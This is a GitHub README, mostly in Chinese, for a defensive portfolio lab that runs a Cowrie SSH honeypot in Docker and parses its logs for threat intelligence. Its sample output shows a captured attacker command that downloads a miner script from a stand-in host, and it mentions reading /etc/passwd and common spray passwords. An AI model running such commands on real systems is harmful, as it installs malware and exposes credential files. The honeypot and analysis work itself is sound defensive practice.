Eduardo1127/honeypot-threat-intelligence-lab

GitHub: Eduardo1127/honeypot-threat-intelligence-lab

基于 Cowrie 和 Docker 的蜜罐威胁情报实验平台,用于捕获并分析攻击者的凭证、命令和恶意载荷。

Stars: 0 | Forks: 0

# 🍯 蜜罐威胁情报与攻击者遥测实验室 ![蜜罐](https://img.shields.io/badge/Security-Honeypot%20Telemetry-orange.svg) ![威胁情报](https://img.shields.io/badge/Intel-Attacker%20Keystroke%20Logging-blue.svg) ![Docker](https://img.shields.io/badge/Container-Docker%20Compose-brightgreen.svg) ## 📌 项目概述 本仓库包含一个**诱饵蜜罐与威胁情报框架**。它使用 Docker 部署 **Cowrie SSH/Telnet 蜜罐**架构,将攻击者诱骗至伪造的 shell 环境中,捕获其源 IP、尝试使用的凭证以及执行的命令,用于威胁情报分析。 ## 🎯 核心威胁情报功能 * **诱饵 SSH 环境:** 模拟易受攻击的 Linux shell 环境,以诱捕自动化僵尸网络和恶意攻击者。 * **按键与会话记录:** 记录攻击者执行的确切命令(`cat /etc/passwd`、下载恶意软件 payload、`wget`)。 * **威胁情报分析:** 解析 JSON 蜜罐遥测数据,以识别最主要的攻击 IP、密码字典和恶意软件 URL。 ## 📁 仓库结构 ``` honeypot-threat-intelligence-lab/ ├── README.md # Main portfolio documentation ├── docker-compose.yml # Cowrie SSH Decoy Honeypot deployment manifest ├── scripts/ │ └── analyze_honeypot.py # Threat Intelligence log parser & analytics script └── logs/ └── sample_cowrie.json # Simulated raw Cowrie honeypot telemetry events ``` ## 🧪 本地执行与验证 运行蜜罐威胁情报分析解析器: ``` python scripts/analyze_honeypot.py ``` ### 预期输出: ``` ================================================================== 🍯 HONEYPOT THREAT INTELLIGENCE ANALYTICS RUNNER ================================================================== [+] Parsing Telemetry Log: logs/sample_cowrie.json... [!] Top Attacking IP Identified: 185.220.101.5 (Attempts: 12) [!] Most Common Password Spray Attempt: "admin123", "root", "123456" [!] Captured Malicious Command Payload: "wget http://malware.bad/miner.sh -O /tmp/miner.sh" ================================================================== [SUCCESS] Threat Intelligence Analysis Complete. ================================================================== ``` ## 👨‍💻 作者与联系方式 * **作品集作者:** Eduardo Mex Rodriguez (EMR)(防御性安全与威胁情报) * **LinkedIn:** [你的 LinkedIn 个人资料] * **GitHub:** [@你的-github-用户名]
标签:Docker, Homebrew安装, Python, 威胁情报, 安全, 安全防御评估, 开发者工具, 无后门, 版权保护, 蜜罐, 证书利用, 请求拦截, 超时处理, 逆向工具